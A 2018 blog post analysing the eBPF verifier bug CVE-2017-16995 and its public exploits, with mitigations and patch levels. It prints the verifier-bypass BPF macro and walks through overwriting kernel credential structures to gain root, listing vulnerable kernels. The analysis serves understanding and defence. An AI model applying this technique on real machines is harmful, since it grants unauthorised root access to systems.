Monday, July 9, 2018

eBPF and Analysis of the get-rekt-linux-hardened.c Exploit for CVE-2017-16995

CVE-2017-16995

"One of the best/worst Linux kernel vulns of all time" - @bleidl




The vulnerability allows arbitrary read/write access to Linux kernel memory, bypassing SMEP/SMAP.


Bruce Leidl @bleidl
June 4, 2017 https://twitter.com/bleidl/status/871527499984982016

Jann Horn @tehjh
December 4, 2017 - https://bugs.chromium.org/p/project-zero/issues/detail?id=1454&desc=3

https://github.com/torvalds/linux/commit/95a762e2c8c942780948091f8f2a4f32fce1ac6f

https://lwn.net/Articles/742169/ 

December 23
https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c

Vitaly Nikolenko @vnik5287 
March 15, 2018 - https://twitter.com/vnik5287/status/974277953394651137
http://cyseclabs.com/pub/upstream44.c

 

Vulnerability 

It is possible to bypass the BPF verifier (verifier.c), load BPF code, and create a read/write primitive. The root cause of this vulnerability is improper sign extension in the 'check_alu_op()' function located within verifier.c. The verifier applied sign extension to the 32-bit immediate in both of the following cases, although only the first one is sign-extended when the program runs:

BPF_ALU64|BPF_MOV|BPF_K (load 32-bit immediate, sign-extended to 64-bit)

BPF_ALU|BPF_MOV|BPF_K (load 32-bit immediate, zero-padded to 64-bit)

Please see https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=95a762e2c8c942780948091f8f2a4f32fce1ac6f for specifics. Ultimately, the bug was patched by correcting the arithmetic in the 'check_alu_op()' function and ensuring sign extension only occurs in the first case, "BPF_ALU64|BPF_MOV|BPF_K (load 32-bit immediate, sign-extended to 64-bit)".
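The difference between the two cases can be reproduced in plain C. The following is a minimal sketch, not kernel code: the function names are made up for illustration, and the casts only model how a 32-bit immediate is widened under each interpretation.

```c
#include <assert.h>
#include <stdint.h>

/* Pre-patch verifier model: every MOV immediate is sign-extended to 64 bits.
 * The int32_t conversion relies on two's-complement behaviour (gcc/clang). */
static uint64_t mov_imm_sign_extended(uint32_t imm)
{
    return (uint64_t)(int64_t)(int32_t)imm;
}

/* Run-time behaviour of BPF_ALU|BPF_MOV|BPF_K: the upper 32 bits are zeroed. */
static uint64_t mov_imm_zero_extended(uint32_t imm)
{
    return (uint64_t)imm;
}

/* The two models agree only when bit 31 of the immediate is clear. */
static void sign_extension_example(void)
{
    assert(mov_imm_sign_extended(0x7FFFFFFFu) == mov_imm_zero_extended(0x7FFFFFFFu));
    assert(mov_imm_sign_extended(0xFFFFFFFFu) == 0xFFFFFFFFFFFFFFFFULL);
    assert(mov_imm_zero_extended(0xFFFFFFFFu) == 0x00000000FFFFFFFFULL);
}
```

For the immediate 0xFFFFFFFF the two interpretations disagree in the upper 32 bits, which is exactly the gap between what the verifier believed and what the program computes.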

Exploit/POC - get-rekt-linux-hardened.c

The BPF instruction sequence that bypasses the verifier is:
#define BPF_DISABLE_VERIFIER()                                                       \
        BPF_MOV32_IMM(BPF_REG_2, 0xFFFFFFFF),             /* r2 = (u32)0xFFFFFFFF   */   \
        BPF_JMP_IMM(BPF_JNE, BPF_REG_2, 0xFFFFFFFF, 2),   /* if (r2 == -1) {        */   \
        BPF_MOV64_IMM(BPF_REG_0, 0),                      /*   exit(0);             */   \
        BPF_EXIT_INSN()                                   /* }                      */
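To see why this sequence defeats the verifier, it helps to evaluate the BPF_JNE comparison twice: once with the register value the unpatched verifier assumed, and once with the value the register holds at run time. The sketch below is a user-space model only; the helper names are hypothetical, and it assumes (as the patch description indicates) that the verifier tracked r2 as a sign-extended constant while the jump itself compares against a sign-extended immediate.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* BPF_JMP|BPF_JNE|BPF_K: the 64-bit register is compared with the
 * immediate sign-extended to 64 bits. Returns true if the jump is taken. */
static bool jne_taken(uint64_t reg, int32_t imm)
{
    return reg != (uint64_t)(int64_t)imm;
}

/* r2 after BPF_MOV32_IMM(r2, 0xFFFFFFFF) as the unpatched verifier modelled it. */
static uint64_t r2_verifier_model(void)
{
    return (uint64_t)(int64_t)-1;       /* 0xFFFFFFFFFFFFFFFF */
}

/* r2 after the same instruction when the program actually runs. */
static uint64_t r2_runtime(void)
{
    return (uint64_t)0xFFFFFFFFu;       /* 0x00000000FFFFFFFF */
}

static void disable_verifier_example(void)
{
    /* Verifier: values look equal, so only the fall-through (exit) path is checked. */
    assert(!jne_taken(r2_verifier_model(), -1));
    /* Run time: values differ, so the jump skips the exit into unchecked code. */
    assert(jne_taken(r2_runtime(), -1));
}
```

Under these assumptions the verifier only ever analyses the path that ends in BPF_EXIT_INSN(), so whatever follows the macro is never verified, yet it is the code that executes.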


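The BPF instruction set is well documented (see the eBPF references at the end of this post). The exploit's BPF code accepts an OP parameter that selects one of four operations:
  0 = Read the address of the frame pointer
  1 = Read the address of the sk_buff structure
  2 = Read a user-supplied address
  3 = Write a value to a specified address

These operations are invoked through the sendcmd function, which takes the following parameters:
sendcmd(op, address, value to write)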
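The command interface above can be mimicked in user space to make the four operations concrete. This is a mock under loud assumptions: mock_sendcmd, the enum names, the fake addresses, and the small array standing in for kernel memory are all invented for illustration, and the way the real exploit passes commands to its BPF program is not modelled.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Operation numbers as listed in the text; the names are hypothetical. */
enum mock_op { OP_GET_FP = 0, OP_GET_SKB = 1, OP_READ = 2, OP_WRITE = 3 };

#define MOCK_WORDS 16
#define MOCK_FP    0x1000ULL    /* fake frame pointer value */
#define MOCK_SKB   0x2000ULL    /* fake sk_buff address     */

static uint64_t mock_mem[MOCK_WORDS];   /* stands in for kernel memory */

/* Same parameter order as sendcmd(op, address, value to write).
 * Here "address" is simply a byte offset into mock_mem. */
static uint64_t mock_sendcmd(uint64_t op, uint64_t addr, uint64_t value)
{
    size_t idx = (size_t)(addr / sizeof(uint64_t));

    switch (op) {
    case OP_GET_FP:
        return MOCK_FP;
    case OP_GET_SKB:
        return MOCK_SKB;
    case OP_READ:
        return idx < MOCK_WORDS ? mock_mem[idx] : 0;
    case OP_WRITE:
        if (idx < MOCK_WORDS)
            mock_mem[idx] = value;
        return 0;
    default:
        return 0;
    }
}

static void sendcmd_example(void)
{
    mock_sendcmd(OP_WRITE, 8, 0x41);                 /* write 0x41 at offset 8 */
    assert(mock_sendcmd(OP_READ, 8, 0) == 0x41);     /* read it back           */
}
```

Operations 2 and 3 together are the arbitrary read/write primitive; operations 0 and 1 provide the starting addresses used by the privilege escalation steps.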


Privilege escalation

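The BPF code is set up to obtain the pointer to sk_buff (OP = 1).
With access to the sk_buff structure, it is possible to find the sock structure: on x86_64 the sk pointer sits at an offset of 24 bytes (0x18), directly after the 24-byte union at the start of the structure.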

include/linux/skbuff.h

struct sk_buff {
        union {
                struct {
                        /* These two members must be first. */
                        struct sk_buff          *next;
                        struct sk_buff          *prev;

                        union {
                                ktime_t         tstamp;
                                u64             skb_mstamp;
                        };
                };
                struct rb_node  rbnode; /* used in netem & tcp stack */
        };
        struct sock             *sk;     <=========
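The position of the sk pointer can be checked with offsetof on a stand-in structure. The sketch below assumes a 64-bit build and uses mock types (mock_rb_node, mock_sk_buff) that only copy the field sizes of the listing above; it is not the kernel definition.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Stand-in for struct rb_node: one unsigned long plus two pointers. */
struct mock_rb_node {
    unsigned long parent_color;
    void *right;
    void *left;
};

/* Mirrors only the leading fields of struct sk_buff shown in the listing. */
struct mock_sk_buff {
    union {
        struct {
            void *next;
            void *prev;
            union {
                int64_t  tstamp;       /* ktime_t is a 64-bit value */
                uint64_t skb_mstamp;
            };
        };
        struct mock_rb_node rbnode;
    };
    void *sk;                          /* the pointer the exploit reads */
};

/* Byte offset of sk within the mock layout. */
static size_t mock_sk_offset(void)
{
    return offsetof(struct mock_sk_buff, sk);
}

static void sk_offset_example(void)
{
    /* Only meaningful on 64-bit targets, where pointers are 8 bytes. */
    if (sizeof(void *) == 8)
        assert(mock_sk_offset() == 24);
}
```

On a 64-bit target the leading union occupies three 8-byte words, so reading 8 bytes at sk_buff + 24 yields the sock address.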

 

With the address of the sock structure, scan down looking for sk_rcvtimeo by testing for the value 0x7fffffffffffffff.

Check the address 24 bytes above it (sk_uid) to determine whether it contains the UID of the current user. If it does, sk_rcvtimeo has been found, and sk_peer_cred is located 8 bytes above it.

struct sock {
        ...snipped...
        u16                     sk_gso_max_segs;
        unsigned long           sk_lingertime;
        struct proto            *sk_prot_creator;
        rwlock_t                sk_callback_lock;
        int                     sk_err,
                                sk_err_soft;
        u32                     sk_ack_backlog;
        u32                     sk_max_ack_backlog;
        kuid_t                  sk_uid;                <======= test for current UID
        struct pid              *sk_peer_pid;
        const struct cred       *sk_peer_cred;
        long                    sk_rcvtimeo;           <======= scan to look for 0x7fffffffffffffff
        ktime_t                 sk_stamp;
        u16                     sk_tsflags;
        u8                      sk_shutdown;

        ...snipped...
}

sk_peer_cred contains the address of the credential structure, which can be overwritten to escalate privileges.
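The scan described above can be sketched over a buffer of 64-bit words standing in for the sock structure. This is an illustration, not the exploit's code: find_peer_cred_index is a hypothetical helper, and it assumes a little-endian 64-bit layout in which sk_uid occupies the low 32 bits of the word three slots before sk_rcvtimeo.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define RCVTIMEO_MARKER 0x7fffffffffffffffULL   /* value the text scans for */

/* Returns the index of the sk_peer_cred word, or -1 if no match is found.
 * words[] models the sock structure read 8 bytes at a time. */
static long find_peer_cred_index(const uint64_t *words, size_t n, uint32_t uid)
{
    for (size_t i = 3; i < n; i++) {
        if (words[i] != RCVTIMEO_MARKER)
            continue;
        /* sk_uid is 24 bytes (3 words) before sk_rcvtimeo; kuid_t is 32 bits. */
        if ((uint32_t)words[i - 3] != uid)
            continue;
        return (long)(i - 1);   /* sk_peer_cred is 8 bytes before sk_rcvtimeo */
    }
    return -1;
}

static void scan_example(void)
{
    const uint64_t fake_sock[] = {
        5, 6, 7,
        RCVTIMEO_MARKER,            /* decoy: the word 3 slots back is not the UID */
        1000,                       /* sk_uid                                      */
        0xffff880011112222ULL,      /* sk_peer_pid                                 */
        0xffff880033334444ULL,      /* sk_peer_cred                                */
        RCVTIMEO_MARKER,            /* sk_rcvtimeo                                 */
    };
    assert(find_peer_cred_index(fake_sock, 8, 1000) == 6);
}
```

The UID test is what rejects unrelated words that happen to hold 0x7fffffffffffffff, as the decoy entry in the example shows.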

 

Exploit/POC - Adapting @bleidl's exploit to include 4.4.x kernels

https://github.com/rlarabee/exploits/blob/master/cve-2017-16995/cve-2017-16995.c

I have tested it on the following kernels
Ubuntu 16.04
  4.4.0-31-generic
  4.4.0-62-generic
  4.4.0-81-generic
  4.4.0-116-generic
  4.8.0-58-generic
  4.10.0-42-generic
  4.13.0-21-generic


Fedora 27
  4.13.9-300


The issue with the 4.4.x kernels in Ubuntu is that the sock structure does not have the sk_uid field, which contains the user ID of the owner, so the UID test used above is not available.

4.4: /usr/src/linux-source-4.4.0/linux-source-4.4.0/include/net/sock.h
struct sock {
        ...snipped...
        u16                     sk_gso_max_segs;
        int                     sk_rcvlowat;
        unsigned long           sk_lingertime;
        struct sk_buff_head     sk_error_queue;
        struct proto            *sk_prot_creator;
        rwlock_t                sk_callback_lock;
        int                     sk_err,
                                sk_err_soft;
        u32                     sk_ack_backlog;
        u32                     sk_max_ack_backlog;
        __u32                   sk_priority;
#if IS_ENABLED(CONFIG_CGROUP_NET_PRIO)
        __u32                   sk_cgrp_prioidx;
#endif
        struct pid              *sk_peer_pid;
        const struct cred       *sk_peer_cred;
        long                    sk_rcvtimeo;           <======= scan to look for 0x7fffffffffffffff
        long                    sk_sndtimeo;
        struct timer_list       sk_timer;

        ...snipped...
}

4.13 /usr/src/linux-source-4.13.0/linux-source-4.13.0/include/net/sock.h
struct sock {
        ...snipped...
        u16                     sk_gso_max_segs;
        unsigned long           sk_lingertime;
        struct proto            *sk_prot_creator;
        rwlock_t                sk_callback_lock;
        int                     sk_err,
                                sk_err_soft;
        u32                     sk_ack_backlog;
        u32                     sk_max_ack_backlog;
        kuid_t                  sk_uid;                <======= test for current UID (Missing in 4.4)
        struct pid              *sk_peer_pid;
        const struct cred       *sk_peer_cred;
        long                    sk_rcvtimeo;           <======= scan to look for 0x7fffffffffffffff
        ktime_t                 sk_stamp;
        u16                     sk_tsflags;
        u8                      sk_shutdown;

        ...snipped...
}


Because this vulnerability allows arbitrary read/write access, we can scan through the sock structure and test candidate addresses to see whether they point to the correct cred structure.

Using the same logic as before, the code scans through the sock structure looking for 0x7fffffffffffffff.
Once it finds the value, it tests the address stored 8 bytes above it:
1) Is it in kernel memory (address > physoffset (0xffff880000000000))?
2) When the address is evaluated as a cred structure, does it contain the current UID?

struct sock {
        ...snipped...
        u16                     sk_gso_max_segs;
        int                     sk_rcvlowat;
        unsigned long           sk_lingertime;
        struct sk_buff_head     sk_error_queue;
        struct proto            *sk_prot_creator;
        rwlock_t                sk_callback_lock;
        int                     sk_err,
                                sk_err_soft;
        u32                     sk_ack_backlog;
        u32                     sk_max_ack_backlog;
        __u32                   sk_priority;
#if IS_ENABLED(CONFIG_CGROUP_NET_PRIO)
        __u32                   sk_cgrp_prioidx;
#endif
        struct pid              *sk_peer_pid;
        const struct cred       *sk_peer_cred;         <======= Evaluate this address
        long                    sk_rcvtimeo;           <======= scan to look for 0x7fffffffffffffff
        long                    sk_sndtimeo;
        struct timer_list       sk_timer;

        ...snipped...
}

struct cred {
        atomic_t        usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
        atomic_t        subscribers;    /* number of processes subscribed */
        void            *put_addr;
        unsigned        magic;
#define CRED_MAGIC      0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
        kuid_t          uid;            /* real UID of the task */ <== Evaluate if this equals current UID
        kgid_t          gid;            /* real GID of the task */
        kuid_t          suid;           /* saved UID of the task */
        kgid_t          sgid;           /* saved GID of the task */
        kuid_t          euid;           /* effective UID of the task */
        kgid_t          egid;           /* effective GID of the task */
        kuid_t          fsuid;          /* UID for VFS ops */
        kgid_t          fsgid;          /* GID for VFS ops */
        unsigned        securebits;     /* SUID-less security management */
        kernel_cap_t    cap_inheritable; /* caps our children can inherit */
        kernel_cap_t    cap_permitted;  /* caps we're permitted */
        kernel_cap_t    cap_effective;  /* caps we can actually use */
        kernel_cap_t    cap_bset;       /* capability bounding set */
        kernel_cap_t    cap_ambient;    /* Ambient capability set */

 

As before, sk_peer_cred contains the address of the credential structure, which can be overwritten to escalate privileges.
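The two tests used for 4.4.x kernels can be sketched against a mocked read primitive. Everything here is illustrative: find_cred_44, mock_read64 and the fake addresses are invented, the lower bound is the value quoted above, and the UID offset of 4 assumes a kernel built without CONFIG_DEBUG_CREDENTIALS so that uid directly follows the 4-byte usage counter.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define RCVTIMEO_MARKER 0x7fffffffffffffffULL
#define KERNEL_BASE     0xffff880000000000ULL  /* lower bound quoted in the text */
#define CRED_UID_OFFSET 4   /* assumption: no CONFIG_DEBUG_CREDENTIALS */

typedef uint64_t (*read64_fn)(uint64_t addr);

/* Returns the candidate cred address that passes both tests, or 0. */
static uint64_t find_cred_44(read64_fn read64, uint64_t sock,
                             uint64_t max_bytes, uint32_t uid)
{
    for (uint64_t off = 8; off < max_bytes; off += 8) {
        if (read64(sock + off) != RCVTIMEO_MARKER)
            continue;
        uint64_t cand = read64(sock + off - 8);   /* word 8 bytes above */
        if (cand <= KERNEL_BASE)                  /* test 1: kernel address? */
            continue;
        /* test 2: low 32 bits of the word at cred+4 hold cred->uid */
        if ((uint32_t)read64(cand + CRED_UID_OFFSET) == uid)
            return cand;
    }
    return 0;
}

/* Mock memory: a handful of (address, value) pairs; all else reads as 0. */
#define MOCK_SOCK 0xffff880010000000ULL
#define MOCK_CRED 0xffff880020000000ULL

static uint64_t mock_read64(uint64_t addr)
{
    static const struct { uint64_t addr, value; } mem[] = {
        { MOCK_SOCK + 0x08, 0x1234 },               /* not a kernel pointer */
        { MOCK_SOCK + 0x10, RCVTIMEO_MARKER },      /* decoy marker         */
        { MOCK_SOCK + 0x20, MOCK_CRED },            /* sk_peer_cred         */
        { MOCK_SOCK + 0x28, RCVTIMEO_MARKER },      /* sk_rcvtimeo          */
        { MOCK_CRED + 0x04, 0x000003e8000003e8ULL } /* uid=1000, gid=1000   */
    };
    for (size_t i = 0; i < sizeof(mem) / sizeof(mem[0]); i++)
        if (mem[i].addr == addr)
            return mem[i].value;
    return 0;
}
```

With the mock data, the first marker is rejected because the preceding word is not a kernel address, and the second is accepted once the UID at the candidate cred matches.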

 

Exploit/POC - Upstream.c (4.4.x kernels)

Dangokyo has a good description of the vulnerability, exploit, and privilege escalation technique.

Upstream.c from @vnik5287 uses a different technique for privilege escalation.

In the 4.4 kernel, the thread_info struct sits at the base of the kernel stack (its lowest address), and its first member points to the task_struct:

linux-source-4.4.0_4.4.0-116.140_all.deb
/usr/src/linux-source-4.4.0/linux-source-4.4.0/arch/x86/include/asm/thread_info.h
struct thread_info {
        struct task_struct      *task;          /* main task structure */ <==========
        __u32                   flags;          /* low level flags */
        __u32                   status;         /* thread synchronous flags */
        __u32                   cpu;            /* current CPU */
        mm_segment_t            addr_limit;
        unsigned int            sig_on_uaccess_error:1;
        unsigned int            uaccess_err:1;  /* uaccess failed */
};


In later versions, the task_struct pointer has been removed from thread_info, so this technique no longer applies as-is.

linux-source-4.13.0_4.13.0-21.24_all.deb
/usr/src/linux-source-4.13.0/linux-source-4.13.0/arch/x86/include/asm/thread_info.h
struct thread_info {
        unsigned long           flags;          /* low level flags */
};


Privilege Escalation

Linux kernel stacks start with a struct thread_info that looks like this:

 * struct thread_info {
 *  struct task_struct *task;   // <--- pointer to current task_struct

The task structure contains lots of fields, but the one we are most
interested in is:

 * struct task_struct { 
 *   // ...
 *   const struct cred *real_cred;  <========

Struct cred contains:

 * struct cred {
 *   // ...
 *   uid_t           uid;
 *   gid_t           gid;
 *   uid_t           suid;
 *   gid_t           sgid;
 *   uid_t           euid;
 *   gid_t           egid;
 *   uid_t           fsuid;
 *   gid_t           fsgid;
 *   unsigned        securebits;
 *   kernel_cap_t    cap_inheritable;
 *   kernel_cap_t    cap_permitted;
 *   kernel_cap_t    cap_effective;

real_cred contains the address of the credential structure, which can be overwritten to escalate privileges.
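Because thread_info lives at the start of the kernel stack, its address can be derived from any address inside that stack (for example the frame pointer returned by OP = 0) by masking off the low bits. The sketch below is a guess at the arithmetic, not code taken from upstream44.c: it assumes 16 KiB kernel stacks (THREAD_SIZE_ASSUMED), and mock_cred_ids is a hypothetical stand-in for the ID fields of struct cred.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define THREAD_SIZE_ASSUMED 0x4000ULL   /* assumption: 16 KiB stacks (x86_64, 4.4) */

/* Round a kernel stack address down to the start of its stack,
 * which is where struct thread_info sits on 4.4. */
static uint64_t thread_info_from_sp(uint64_t sp)
{
    return sp & ~(THREAD_SIZE_ASSUMED - 1);
}

/* Stand-in for the eight ID fields listed in struct cred above. */
struct mock_cred_ids {
    uint32_t uid, gid, suid, sgid, euid, egid, fsuid, fsgid;
};

/* Setting every ID to 0 is the effect the overwrite aims for (root). */
static void zero_cred_ids(struct mock_cred_ids *ids)
{
    memset(ids, 0, sizeof(*ids));
}

static void thread_info_example(void)
{
    /* Any address inside the stack maps to the same base. */
    assert(thread_info_from_sp(0xffff88003a2b7e58ULL) == 0xffff88003a2b4000ULL);

    struct mock_cred_ids ids = { 1000, 1000, 1000, 1000, 1000, 1000, 1000, 1000 };
    zero_cred_ids(&ids);
    assert(ids.uid == 0 && ids.fsgid == 0);
}
```

From the thread_info base, the chain described above is: read the task pointer, read real_cred from the task_struct (at an offset that depends on the kernel build), then write zeros over the ID fields.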

 

Mitigations

Kernel Patch level
Ubuntu
https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-16995.html

4.4.x: Fixed 4.4.0-119.143
4.8.x: vulnerable up through 4.8.0-58-generic
4.10.x: vulnerable up through 4.10.0-42-generic
4.13.x: Fixed 4.13.0-25-generic

Red Hat
https://bugzilla.redhat.com/show_bug.cgi?id=1528518
RHEL 5, 6, and 7: not affected

Fedora: Fixed in kernel-4.14.11, which was pushed to stable on January 4, 2018

Workaround: disable unprivileged use of BPF (as root) with either of the following commands:
echo 1 > /proc/sys/kernel/unprivileged_bpf_disabled
sysctl kernel.unprivileged_bpf_disabled=1
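Whether the workaround is active can be checked by reading the same sysctl file back. The following is a small sketch; the helper names are made up, and it treats any value greater than zero as "unprivileged BPF blocked" and a missing or unreadable file as unknown.

```c
#include <assert.h>
#include <stdio.h>

#define BPF_SYSCTL_PATH "/proc/sys/kernel/unprivileged_bpf_disabled"

/* Reads one integer from a file. Returns -1 if the file cannot be
 * opened or does not start with a number. */
static long read_long_from_file(const char *path)
{
    FILE *f = fopen(path, "r");
    if (!f)
        return -1;

    long value = 0;
    int matched = fscanf(f, "%ld", &value);
    fclose(f);
    return matched == 1 ? value : -1;
}

/* 0 means unprivileged BPF is allowed; a positive value means it is blocked. */
static int unprivileged_bpf_blocked(long sysctl_value)
{
    return sysctl_value > 0;
}

/* Prints the current state; call this from main() on the system under test. */
static void report_bpf_sysctl(void)
{
    long v = read_long_from_file(BPF_SYSCTL_PATH);
    if (v < 0)
        printf("unprivileged_bpf_disabled: not available\n");
    else
        printf("unprivileged_bpf_disabled=%ld (%s)\n", v,
               unprivileged_bpf_blocked(v) ? "blocked" : "allowed");
}
```

A setting applied with echo or sysctl does not survive a reboot; it can be made persistent through the distribution's sysctl configuration.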

References/Resources

eBPF

https://www.kernel.org/doc/Documentation/networking/filter.txt
https://www.kernel.org/doc/Documentation/bpf/bpf_design_QA.txt
http://www.brendangregg.com/ebpf.html 
https://github.com/iovisor/bcc 
https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/ 
https://ferrisellis.com/posts/ebpf_past_present_future/
https://ferrisellis.com/posts/ebpf_syscall_and_maps/
https://suchakra.wordpress.com/2015/05/18/bpf-internals-i/
https://suchakra.wordpress.com/2015/08/12/bpf-internals-ii/

CVE-2017-16995

https://github.com/rapid7/metasploit-framework/blob/691d8f2c413bbda942fd49afe45d79771a5d1b10/modules/exploits/linux/local/bpf_sign_extension_priv_esc.rb
http://www.openwall.com/lists/oss-security/2017/12/21/2
https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c
https://github.com/rlarabee/exploits/blob/master/cve-2017-16995/cve-2017-16995.c
http://cyseclabs.com/pub/upstream44.c
https://www.exploit-db.com/exploits/44298/
https://github.com/dangokyo/CVE_2017_16995 - nice disassembler.c to better visualize bpf code
https://blog.aquasec.com/ebpf-vulnerability-cve-2017-16995-when-the-doorman-becomes-the-backdoor
https://www.securityfocus.com/bid/102288
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16995
https://nvd.nist.gov/vuln/detail/CVE-2017-16995